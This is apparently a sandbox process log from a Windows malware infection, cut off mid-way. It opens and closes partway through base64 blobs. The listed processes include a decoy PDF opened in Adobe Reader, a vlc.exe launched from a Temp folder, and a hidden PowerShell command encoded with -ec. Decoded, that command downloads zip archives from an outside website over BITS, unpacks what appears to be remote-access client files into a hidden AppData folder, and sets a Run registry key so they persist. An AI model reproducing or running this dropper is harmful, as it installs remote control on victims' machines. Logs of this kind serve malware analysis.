QUxBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFBa0FIUUFRUUExQURBQVJRQTlBQ2NBUWdCSkFGUUFVd0JCQUdRQWJRQkpBRTRBTGdCRkFIZ0FSUUFnQUM4QVZBQlNBR0VBVGdCVEFHWUFSUUJ5QUNBQU1BQjJBR0VBYUFCc0FDQUFMd0JFQUU4QWR3QnVBRXdBVHdCQkFHUUFJQUF2QUhBQWNnQnBBRThBVWdCcEFGUUFlUUFnQUU0QVR3QnlBRTBBWVFCc0FDQUFKd0FyQUNRQVJBQXpBR2NBYkFCd0FDc0FKd0FnQUNjQUt3QWtBRVlBWXdCdEFGWUFWd0J6QUZrQU93QWdBQ1FBTWdCeEFHWUFhQUJKQUc4QVpRQTlBQ0lBSkFCRkFHNEFkZ0E2QUdFQWNBQndBRVFBUVFCVUFFRUFYQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FpQURzQUlBQWtBR1FBZFFCdUFGUUFOd0JCQUZVQVBRQWlBR0lBYVFCMEFGTUFZUUJrQUcwQVNRQnVBQzRBWlFCWUFHVUFJQUF2QUhRQVVnQkJBRTRBVXdCbUFHVUFVZ0FnQUZjQVJBQmFBSE1BVHdCbkFDQUFMd0JrQUc4QWR3Qk9BRXdBYndCQkFFUUFJQUF2QUhBQVVnQnBBRzhBY2dCcEFGUUFlUUFnQUU0QWJ3QlNBRTBBUVFCc0FDQUFld0F3QUgwQUlBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQUxBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBQ1FBVndCTkFHVUFiQUJvQUZvQVN3QTlBQ0lBWWdCcEFIUUFVd0JoQUdRQWJRQkpBRzRBTGdCbEFGZ0FaUUFnQUM4QWRBQlNBRUVBVGdCVEFHWUFaUUJTQUNBQVZ3QkVBRm9BY3dCUEFHY0FJQUF2QUdRQWJ3QjNBRTRBVEFCdkFFRUFSQUFnQUM4QWNBQlNBR2tBYndCeUFHa0FWQUI1QUNBQVRnQnZBRklBVFFCQkFHd0FJQUFrQUZJQWNnQk9BR2dBU0FCSkFHVUFJQUFrQUU0QWN3QktBSGdBZFFCWkFEZ0FWQUFpQURzQUlBQkpBRVlBSUFBb0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBcEFDQUFld0FnQUdrQVJnQWdBQ2dBSkFCdUFFVUFOQUJCQUU0QVRBQm1BQ2tBSUFCN0FDQUFjd0IwQUVFQVVnQlVBQzBBWWdCcEFGUUFVd0IwQUhJQVFRQk9BRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBRklBUXdCRkFDQUFKQUJFQURNQVp3QnNBSEFBSUFBdEFFUUFaUUJUQUZRQWFRQk9BRUVBVkFCcEFFOEFUZ0FnQUNRQVJnQmpBRzBBVmdCWEFITUFXUUE3QUNBQWN3QjBBRUVBY2dCVUFDMEFZZ0JwQUZRQWN3QjBBRklBUVFCT0FGTUFSZ0JGQUhJQUlBQXRBSE1BVHdCVkFISUFRd0JsQUNBQUpBQlNBR2NBZWdBMUFGY0FUQUJ1QUNBQUxRQmtBRVVBY3dCVUFFa0FUZ0JCQUZRQWFRQlBBRzRBSUFBa0FIZ0FTQUJtQURVQWVBQnZBRTBBZFFBN0FDQUFVd0JVQUVFQVVnQjBBQzBBUWdCSkFIUUFjd0IwQUhJQVlRQnVBRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBSElBUXdCbEFDQUFKQUJTQUhJQVRnQm9BRWdBU1FCbEFDQUFMUUJFQUdVQWN3QlVBR2tBVGdCaEFGUUFhUUJQQUU0QUlBQWtBRTRBY3dCS0FIZ0FkUUJaQURnQVZBQTdBQ0FBVXdCVUFFRUFjZ0JVQUMwQVFnQkpBRlFBVXdCVUFISUFZUUJPQUhNQVJnQkZBSElBSUFBdEFITUFid0JWQUZJQVl3QkZBQ0FBSkFCcEFHVUFVUUJ5QUdRQU9RQmtBRU1BSUFBdEFHUUFaUUJ6QUZRQWFRQk9BRUVBZEFCSkFHOEFiZ0FnQUNRQVpBQXdBRVFBTndCWkFIQUFPd0FnQUgwQUlBQkZBR3dBVXdCbEFDQUFld0JwQUc0QWRnQnZBRXNBWlFBdEFHVUFXQUJ3QUZJQVpRQnpBRk1BU1FCUEFFNEFJQUF0QUVNQWJ3Qk5BRzBBUVFCdUFHUUFJQUFrQUVzQVRnQTJBRTBBVEFCeUFHd0FhZ0E3QUNBQVNRQk9BRllBYndCTEFFVUFMUUJsQUZnQVVBQnlBR1VBY3dCVEFFa0Fid0J1QUNBQUxRQkRBRThBVFFCTkFFRUFUZ0JrQUNBQUpBQjBBRUVBTlFBd0FFVUFPd0FnQUVrQVJRQllBQ0FBTFFCREFFOEFUUUJ0QUVFQWJnQmtBQ0FBSkFCWEFFMEFaUUJzQUdnQVdnQkxBRHNBSUFCSkFHNEFWZ0J2QUVzQVJRQXRBR1VBV0FCUUFGSUFSUUJ6QUZNQVNRQlBBRzRBSUFBdEFFTUFid0J0QUUwQVFRQk9BR1FBSUFBa0FHUUFkUUJ1QUZRQU53QkJBRlVBT3dBZ0FIMEFJQUJsQUZnQWNBQmhBRTRBWkFBdEFHRUFVZ0JEQUVnQVNRQldBRVVBSUFBdEFGQUFZUUIwQUdnQUlBQWtBSGdBU0FCbUFEVUFlQUJ2QUUwQWRRQWdBQzBBWkFCbEFITUFkQUJKQUc0QVlRQlVBRWtBYndCdUFIQUFRUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBR1VBZUFCUUFHRUFUZ0JrQUMwQVFRQlNBR01BU0FCcEFIWUFSUUFnQUMwQWNBQmhBSFFBU0FBZ0FDUUFUZ0J6QUVvQWVBQjFBRmtBT0FCVUFDQUFMUUJrQUVVQWN3QlVBR2tBVGdCQkFGUUFhUUJQQUc0QWNBQmhBSFFBYUFBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBN0FDQUFSUUI0QUhBQVFRQnVBRVFBTFFCaEFISUFZd0JvQUdrQWRnQkZBQ0FBTFFCUUFHRUFWQUJvQUNBQUpBQkdBR01BYlFCV0FGY0Fjd0JaQUNBQUxRQmtBRVVBY3dCMEFHa0FUZ0JCQUhRQVNRQnZBRzRBVUFCaEFIUUFhQUFnQUNRQU1nQnhBR1lBYUFCSkFHOEFaUUE3QUNBQVJRQjRBRkFBWVFCdUFHUUFMUUJoQUhJQVF3QklBR2tBZGdCRkFDQUFMUUJRQUdFQWRBQklBQ0FBSkFCa0FEQUFSQUEzQUZrQWNBQWdBQzBBUkFCbEFGTUFkQUJwQUc0QVFRQjBBRWtBVHdCdUFGQUFZUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBSElBUlFCTkFFOEFWZ0JsQUMwQVNRQjBBRVVBYlFBZ0FDMEFjQUJoQUhRQWFBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBR1VBVWdCQkFITUFSUUFnQUMwQVVBQmhBSFFBYUFBZ0FDUUFSZ0JqQUcwQVZnQlhBSE1BV1FBN0FDQUFaUUJTQUVFQWN3QkZBQ0FBTFFCd0FHRUFkQUJvQUNBQUpBQk9BSE1BU2dCNEFIVUFXUUE0QUZRQU93QWdBRklBUkFBZ0FDMEFVQUJoQUhRQVNBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFCOUFDQUFaUUJzQUZNQVJRQWdBSHNBSUFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BUFFBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCbkFHRUFhUUJzQUhNQVlRQmpBR0VBWkFCbEFHMEFlUUF1QUdNQWJ3QnRBQzhBWmdCNkFHWUFMd0FuQURzQUlBQnVBRWtBSUFBdEFIQUFZUUIwQUVnQUlBQWtBR1VBYmdCV0FEb0FZUUJRQUZBQVJBQkJBRlFBWVFBZ0FDMEFiZ0JoQUUwQVJRQWdBQ1FBU1FCdUFFTUFSd0F5QURJQVZnQktBQ0FBTFFCcEFIUUFSUUJOQUZRQWVRQlFBRVVBSUFBbkFHUUFhUUJ5QUdVQVl3QjBBRzhBY2dCNUFDY0FPd0FnQUNRQVV3QllBRmdBZEFBMEFEMEFRQUFvQUNjQVFRQjFBR1FBYVFCdkFFTUFZUUJ3QUhRQWRRQnlBR1VBTGdCa0FHd0FiQUFuQUN3QUlBQW5BR01BYkFCcEFHVUFiZ0IwQURNQU1nQXVBR2tBYmdCcEFDY0FMQUFnQUNjQVRnQlRBRTBBTGdCTUFFa0FRd0FuQUN3QUlBQW5BRkFBUXdCSkFFTUFUQUF6QURJQUxnQkVBRXdBVEFBbkFDd0FJQUFuQUZRQVF3QkRBRlFBVEFBekFESUFMZ0JFQUV3QVRBQW5BQ3dBSUFBbkFHNEFjd0J0QUY4QWRnQndBSElBYndBdUFHa0FiZ0JwQUNjQUxBQWdBQ2NBWXdCc0FHa0FaUUJ1QUhRQU13QXlBQzRBWlFCNEFHVUFKd0FzQUNBQUp3QklBRlFBUXdCVUFFd0FNd0F5QUM0QVJBQk1BRXdBSndBc0FDQUFKd0J1QUhNQWF3QmlBR1lBYkFCMEFISUFMZ0JwQUc0QVpnQW5BQ3dBSUFBbkFHMEFjd0IyQUdNQWNnQXhBREFBTUFBdUFHUUFiQUJzQUNjQUxBQWdBQ2NBVUFCREFFa0FRd0JJQUVVQVN3QXVBRVFBVEFCTUFDY0FMQUFnQUNjQWNBQmpBR2tBWXdCaEFIQUFhUUF1QUdRQWJBQnNBQ2NBTEFBZ0FDY0FjZ0JsQUcwQVl3QnRBR1FBY3dCMEFIVUFZZ0F1QUdVQWVBQmxBQ2NBS1FBN0FDQUFhUUJHQUNBQUtBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQUtRQWdBSHNBSUFBa0FGTUFXQUJZQUhRQU5BQWdBSHdBSUFCbUFHOEFVZ0JsQUVFQVl3Qm9BQzBBVHdCaUFHb0FaUUJqQUhRQUlBQjdBQ0FBSkFBeEFFd0FWZ0JUQUVvQWF3QlZBRDBBSkFCb0FHa0FhQUJVQUZnQVV3QktBQ3NBSkFCZkFEc0FJQUFrQUVrQWF3Qk9BRW9BY2dCT0FGY0FQUUJLQUc4QWFRQnVBQzBBY0FCQkFIUUFTQUFnQUMwQVVBQkJBSFFBU0FBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBZ0FDMEFRd0JvQUdrQVRBQmtBRkFBUVFCVUFHZ0FJQUFrQUY4QU93QWdBRk1BZEFCaEFISUFkQUF0QUVJQWFRQjBBRk1BVkFCeUFFRUFiZ0J6QUVZQVJRQlNBQ0FBTFFCekFHOEFkUUJ5QUVNQVpRQWdBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQWdBQzBBUkFCRkFGTUFWQUJKQUU0QVlRQjBBRWtBVHdCdUFDQUFKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUI5QURzQWZRQWdBR1VBVEFCVEFFVUFJQUI3QUNBQUpBQlRBRmdBV0FCMEFEUUFJQUI4QUNBQUpRQWdBSHNBSUFBa0FERUFUQUJXQUZNQVNnQnJBRlVBUFFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BS3dBa0FGOEFPd0FnQUNRQVNRQnJBRTRBU2dCeUFFNEFWd0E5QUNJQUpBQXlBSEVBWmdCb0FFa0Fid0JsQUZ3QUpBQmZBQ0lBT3dBZ0FDUUFSUUJTQUVJQU13QkRBRkVBTWdBOUFDY0FRZ0JKQUhRQVV3QkJBRVFBVFFCcEFHNEFMZ0JGQUZnQVJRQWdBQzhBVkFCeUFFRUFUZ0JUQUdZQVJRQlNBQ0FBY1FCV0FIUUFkZ0JQQUNBQUx3QmtBRThBVndCdUFHd0Fid0JCQUVRQUlBQXZBRkFBY2dCcEFFOEFjZ0JKQUhRQVdRQWdBRzRBVHdCeUFFMEFZUUJzQUNBQUp3QXJBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQXJBQ2NBSUFBbkFDc0FKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUJKQUU0QVZnQnZBRXNBUlFBdEFHVUFXQUJRQUhJQVpRQnpBRk1BU1FCdkFHNEFJQUF0QUVNQVR3Qk5BRTBBUVFCT0FHUUFJQUFrQUVVQVVnQkNBRE1BUXdCUkFESUFPd0I5QURzQUlBQjlBRHNBSUFCOUFEc0FJQUFrQURjQVpnQTFBRzBBZWdCekFGY0FQUUJuQUdVQWRBQXRBR2tBZEFCbEFHMEFJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVZQWJ3QnlBR01BUlFBN0FDQUFKQUEzQUdZQU5RQnRBSG9BY3dCWEFDNEFZUUJVQUZRQVVnQkpBRUlBVlFCVUFHVUFVd0E5QUNjQVNBQnBBR1FBWkFCbEFHNEFKd0E3QUNBQUpBQmhBRUVBVHdCNkFISUFRUUJVQUQwQVNnQnZBR2tBVGdBdEFGQUFRUUIwQUdnQUlBQXRBSEFBWVFCVUFFZ0FJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVNQVNBQkpBR3dBUkFCUUFFRUFWQUJvQUNBQUp3QmpBR3dBYVFCbEFHNEFkQUF6QURJQUxnQmxBSGdBWlFBbkFEc0FJQUJqQUdnQVJBQkpBRklBSUFBa0FESUFjUUJtQUdnQVNRQnZBR1VBT3dBZ0FFNEFaUUJYQUMwQVNRQlVBR1VBVFFCUUFGSUFUd0JRQUdVQVVnQjBBSGtBSUFBdEFGQUFZUUJVQUdnQUlBQW5BRWdBU3dCREFGVUFPZ0JjQUZNQVR3QkdBRlFBVndCQkFGSUFSUUJjQUUwQWFRQmpBSElBYndCekFHOEFaZ0IwQUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUVNQWRRQnlBSElBWlFCdUFIUUFWZ0JsQUhJQWN3QnBBRzhBYmdCY0FGSUFkUUJ1QUNjQUlBQXRBRzRBWVFCTkFFVUFJQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FnQUMwQVZnQmhBRXdBZFFCRkFDQUFKQUJoQUVFQVR3QjZBSElBUVFCVUFDQUFMUUJ3QUhJQWJ3QlFBR1VBY2dCMEFGa0FWQUI1QUZBQVpRQWdBQ2NBVXdCMEFISUFhUUJ1QUdjQUp3QTdBQ0FBY3dCVUFFRUFVZ0IwQUMwQVVBQnlBRThBWXdCRkFITUFVd0FnQUdNQWJBQnBBR1VBYmdCMEFETUFNZ0F1QUdVQWVBQmxBRHNB')); Invoke-Expression $script}"

C:\Windows\SysWOW64\cmd.exe

cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/40be52e41f5e3624fc9f4e60a8e3d6b7/" && (for %F in (*.exe) do start "" "%F")"

C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe

"vlc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\6cd0f015edbf57b8da5aae821d13b6dc.pdf

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\6cd0f015edbf57b8da5aae821d13b6dc.pdf"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec JABpAGUAUQByAGQAOQBkAEMAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGEALwBmADEAYQAuAHoAaQBwACcAOwAgACQASABkAEEAVgB5AHEASAA9AEcAYwBNACAAZQB4AHAAQQBOAGQALQBBAHIAQwBIAEkAVgBlACAALQBFAHIAcgBPAHIAQQBjAFQAaQBPAG4AIABzAEkATABlAE4AVABsAFkAQwBPAG4AVABJAE4AVQBlADsAIAAkAHUAawBYAFgAUgBGAEkAZQA9ACcAbQAzADIAVwBWADUAYgBSAC4AegBpAHAAJwA7ACAAJABSAHIATgBoAEgASQBlAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgA0AGEALgB6AGkAcAAnADsAIAAkAHMAVQBCAHAAYgBmADgAPQAnAEwATwAxAGkAbgBOAEEALgB6AGkAcAAnADsAIAAkAG4ARQA0AEEATgBMAGYAPQBHAGMATQAgAFMAVABhAHIAVAAtAGIAaQBUAHMAdABSAGEAbgBzAGYAZQByACAALQBlAHIAcgBPAFIAYQBjAFQASQBvAE4AIABTAGkAbABlAE4AVABMAHkAYwBvAE4AVABJAG4AdQBFADsAIAAkAGIAbABiAGUAcAB6AFoAPQAnADYARABNAEwAVQAuAHoAaQBwACcAOwAgACQAUgBnAHoANQBXAEwAbgA9ACcAaAB0AHQAcABzADoALwAvAGcAYQBpAGwAcwBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwBmAHoAYQAvAGYAMwBhAC4AegBpAHAAJwA7ACAAWwBuAGUAdAAuAHMARQByAHYAaQBDAEUAUABPAEkATgB0AG0AQQBOAEEARwBFAFIAXQA6ADoAcwBlAEMAdQBSAEkAVABZAHAAUgBPAFQAbwBjAE8AbAAgAD0AIABbAE4AZQB0AC4AcwBFAGMAVQBSAEkAVABZAFAAUgBPAHQATwBjAE8ATAB0AFkAcABlAF0AOgA6AFQATABTADEAMgA7ACAAJABJAG4AQwBHADIAMgBWAEoAPQAnAFQAZQBtAHAAQwBvAG4AdAByAG8AbABsACcAOwAgACQANAB5AEYAYwBKAFYASgA9ACcAbAA4AGUARgBWAE8AUwBTAC4AegBpAHAAJwA7ACAAYwBEACAAJABFAG4AdgA6AEEAcABwAGQAYQB0AGEAOwAgACQARAAzAGcAbABwAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgAyAGEALgB6AGkAcAAnADsAIAAkAEYAYwBtAFYAVwBzAFkAPQAiACQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAJABiAGwAYgBlAHAAegBaACIAOwAgACQAeABIAGYANQB4AG8ATQB1AD0AIgAkAGUATgB2ADoAQQBwAHAARABhAHQAQQBcACQAcwBVAEIAcABiAGYAOAAiADsAIAAkAE4AcwBKAHgAdQBZADgAVAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAG4AVgA6AEEAUABwAEQAQQB0AEEALAAgACQAdQBrAFgAWABSAEYASQBlADsAIAAkAGQAMABEADcAWQBwAD0ASgBvAEkATgAtAFAAQQBUAGgAIAAtAHAAQQB0AEgAIAAkAGUAbgBWADoAQQBQAHAARABBAHQAQQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkADQAeQBGAGMASgBWAEoAOwAgACQASwBOADYATQBMAHIAbABqAD0AIgBiAGkAdABzAGEAZABNAEkATgAuAGUAWABlACAALwBUAFIAQQBOAFMAZgBlAFIAIAB0AGIAZQBOAGsAIAAvAEQATwBXAG4ATABPAEEARAAgAC8AUAByAGkAbwBSAEkAVABZACAAbgBvAHIAbQBBAEwAIAB7ADAAfQAgAHsAMQB9ACIAIAAtAGYAIAAkAFIAZwB6ADUAVwBMAG4ALAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAAkAHQAQQA1ADAARQA9ACcAQgBJAFQAUwBBAGQAbQBJAE4ALgBFAHgARQAgAC8AVABSAGEATgBTAGYARQByACAAMAB2AGEAaABsACAALwBEAE8AdwBuAEwATwBBAGQAIAAvAHAAcgBpAE8AUgBpAFQAeQAgAE4ATwByAE0AYQBsACAAJwArACQARAAzAGcAbABwACsAJwAgACcAKwAkAEYAYwBtAFYAVwBzAFkAOwAgACQAMgBxAGYAaABJAG8AZQA9ACIAJABFAG4AdgA6AGEAcABwAEQAQQBUAEEAXAAkAEkAbgBDAEcAMgAyAFYASgAiADsAIAAkAGQAdQBuAFQANwBBAFUAPQAiAGIAaQB0AFMAYQBkAG0ASQBuAC4AZQBYAGUAIAAvAHQAUgBBAE4AUwBmAGUAUgAgAFcARABaAHMATwBnACAALwBkAG8AdwBOAEwAbwBBAEQAIAAvAHAAUgBpAG8AcgBpAFQAeQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJABpAGUAUQByAGQAOQBkAEMALAAgACQAZAAwAEQANwBZAHAAOwAgACQAVwBNAGUAbABoAFoASwA9ACIAYgBpAHQAUwBhAGQAbQBJAG4ALgBlAFgAZQAgAC8AdABSAEEATgBTAGYAZQBSACAAVwBEAFoAcwBPAGcAIAAvAGQAbwB3AE4ATABvAEEARAAgAC8AcABSAGkAbwByAGkAVAB5ACAATgBvAFIATQBBAGwAIAAkAFIAcgBOAGgASABJAGUAIAAkAE4AcwBKAHgAdQBZADgAVAAiADsAIABJAEYAIAAoACQASABkAEEAVgB5AHEASAApACAAewAgAGkARgAgACgAJABuAEUANABBAE4ATABmACkAIAB7ACAAcwB0AEEAUgBUAC0AYgBpAFQAUwB0AHIAQQBOAFMARgBFAHIAIAAtAHMATwBVAFIAQwBFACAAJABEADMAZwBsAHAAIAAtAEQAZQBTAFQAaQBOAEEAVABpAE8ATgAgACQARgBjAG0AVgBXAHMAWQA7ACAAcwB0AEEAcgBUAC0AYgBpAFQAcwB0AFIAQQBOAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAGcAegA1AFcATABuACAALQBkAEUAcwBUAEkATgBBAFQAaQBPAG4AIAAkAHgASABmADUAeABvAE0AdQA7ACAAUwBUAEEAUgB0AC0AQgBJAHQAcwB0AHIAYQBuAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAHIATgBoAEgASQBlACAALQBEAGUAcwBUAGkATgBhAFQAaQBPAE4AIAAkAE4AcwBKAHgAdQBZADgAVAA7ACAAUwBUAEEAcgBUAC0AQgBJAFQAUwBUAHIAYQBOAHMARgBFAHIAIAAtAHMAbwBVAFIAYwBFACAAJABpAGUAUQByAGQAOQBkAEMAIAAtAGQAZQBzAFQAaQBOAEEAdABJAG8AbgAgACQAZAAwAEQANwBZAHAAOwAgAH0AIABFAGwAUwBlACAAewBpAG4AdgBvAEsAZQAtAGUAWABwAFIAZQBzAFMASQBPAE4AIAAtAEMAbwBNAG0AQQBuAGQAIAAkAEsATgA2AE0ATAByAGwAagA7ACAASQBOAFYAbwBLAEUALQBlAFgAUAByAGUAcwBTAEkAbwBuACAALQBDAE8ATQBNAEEATgBkACAAJAB0AEEANQAwAEUAOwAgAEkARQBYACAALQBDAE8ATQBtAEEAbgBkACAAJABXAE0AZQBsAGgAWgBLADsAIABJAG4AVgBvAEsARQAtAGUAWABQAFIARQBzAFMASQBPAG4AIAAtAEMAbwBtAE0AQQBOAGQAIAAkAGQAdQBuAFQANwBBAFUAOwAgAH0AIABlAFgAcABhAE4AZAAtAGEAUgBDAEgASQBWAEUAIAAtAFAAYQB0AGgAIAAkAHgASABmADUAeABvAE0AdQAgAC0AZABlAHMAdABJAG4AYQBUAEkAbwBuAHAAQQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAGUAeABQAGEATgBkAC0AQQBSAGMASABpAHYARQAgAC0AcABhAHQASAAgACQATgBzAEoAeAB1AFkAOABUACAALQBkAEUAcwBUAGkATgBBAFQAaQBPAG4AcABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AHAAQQBuAEQALQBhAHIAYwBoAGkAdgBFACAALQBQAGEAVABoACAAJABGAGMAbQBWAFcAcwBZACAALQBkAEUAcwB0AGkATgBBAHQASQBvAG4AUABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AFAAYQBuAGQALQBhAHIAQwBIAGkAdgBFACAALQBQAGEAdABIACAAJABkADAARAA3AFkAcAAgAC0ARABlAFMAdABpAG4AQQB0AEkATwBuAFAAYQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAHIARQBNAE8AVgBlAC0ASQB0AEUAbQAgAC0AcABhAHQAaAAgACQAZAAwAEQANwBZAHAAOwAgAGUAUgBBAHMARQAgAC0AUABhAHQAaAAgACQARgBjAG0AVgBXAHMAWQA7ACAAZQBSAEEAcwBFACAALQBwAGEAdABoACAAJABOAHMASgB4AHUAWQA4AFQAOwAgAFIARAAgAC0AUABhAHQASAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAB9ACAAZQBsAFMARQAgAHsAIAAkAGgAaQBoAFQAWABTAEoAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGYALwAnADsAIABuAEkAIAAtAHAAYQB0AEgAIAAkAGUAbgBWADoAYQBQAFAARABBAFQAYQAgAC0AbgBhAE0ARQAgACQASQBuAEMARwAyADIAVgBKACAALQBpAHQARQBNAFQAeQBQAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQAUwBYAFgAdAA0AD0AQAAoACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAG0AcwB2AGMAcgAxADAAMAAuAGQAbABsACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAcgBlAG0AYwBtAGQAcwB0AHUAYgAuAGUAeABlACcAKQA7ACAAaQBGACAAKAAkAG4ARQA0AEEATgBMAGYAKQAgAHsAIAAkAFMAWABYAHQANAAgAHwAIABmAG8AUgBlAEEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJAAxAEwAVgBTAEoAawBVAD0AJABoAGkAaABUAFgAUwBKACsAJABfADsAIAAkAEkAawBOAEoAcgBOAFcAPQBKAG8AaQBuAC0AcABBAHQASAAgAC0AUABBAHQASAAgACQAMgBxAGYAaABJAG8AZQAgAC0AQwBoAGkATABkAFAAQQBUAGgAIAAkAF8AOwAgAFMAdABhAHIAdAAtAEIAaQB0AFMAVAByAEEAbgBzAEYARQBSACAALQBzAG8AdQByAEMAZQAgACQAMQBMAFYAUwBKAGsAVQAgAC0ARABFAFMAVABJAE4AYQB0AEkATwBuACAAJABJAGsATgBKAHIATgBXADsAIAB9ADsAfQAgAGUATABTAEUAIAB7ACAAJABTAFgAWAB0ADQAIAB8ACAAJQAgAHsAIAAkADEATABWAFMASgBrAFUAPQAkAGgAaQBoAFQAWABTAEoAKwAkAF8AOwAgACQASQBrAE4ASgByAE4AVwA9ACIAJAAyAHEAZgBoAEkAbwBlAFwAJABfACIAOwAgACQARQBSAEIAMwBDAFEAMgA9ACcAQgBJAHQAUwBBAEQATQBpAG4ALgBFAFgARQAgAC8AVAByAEEATgBTAGYARQBSACAAcQBWAHQAdgBPACAALwBkAE8AVwBuAGwAbwBBAEQAIAAvAFAAcgBpAE8AcgBJAHQAWQAgAG4ATwByAE0AYQBsACAAJwArACQAMQBMAFYAUwBKAGsAVQArACcAIAAnACsAJABJAGsATgBKAHIATgBXADsAIABJAE4AVgBvAEsARQAtAGUAWABQAHIAZQBzAFMASQBvAG4AIAAtAEMATwBNAE0AQQBOAGQAIAAkAEUAUgBCADMAQwBRADIAOwB9ADsAIAB9ADsAIAB9ADsAIAAkADcAZgA1AG0AegBzAFcAPQBnAGUAdAAtAGkAdABlAG0AIAAkADIAcQBmAGgASQBvAGUAIAAtAEYAbwByAGMARQA7ACAAJAA3AGYANQBtAHoAcwBXAC4AYQBUAFQAUgBJAEIAVQBUAGUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAJABhAEEATwB6AHIAQQBUAD0ASgBvAGkATgAtAFAAQQB0AGgAIAAtAHAAYQBUAEgAIAAkADIAcQBmAGgASQBvAGUAIAAtAEMASABJAGwARABQAEEAVABoACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnADsAIABjAGgARABJAFIAIAAkADIAcQBmAGgASQBvAGUAOwAgAE4AZQBXAC0ASQBUAGUATQBQAFIATwBQAGUAUgB0AHkAIAAtAFAAYQBUAGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAG4AYQBNAEUAIAAkAEkAbgBDAEcAMgAyAFYASgAgAC0AVgBhAEwAdQBFACAAJABhAEEATwB6AHIAQQBUACAALQBwAHIAbwB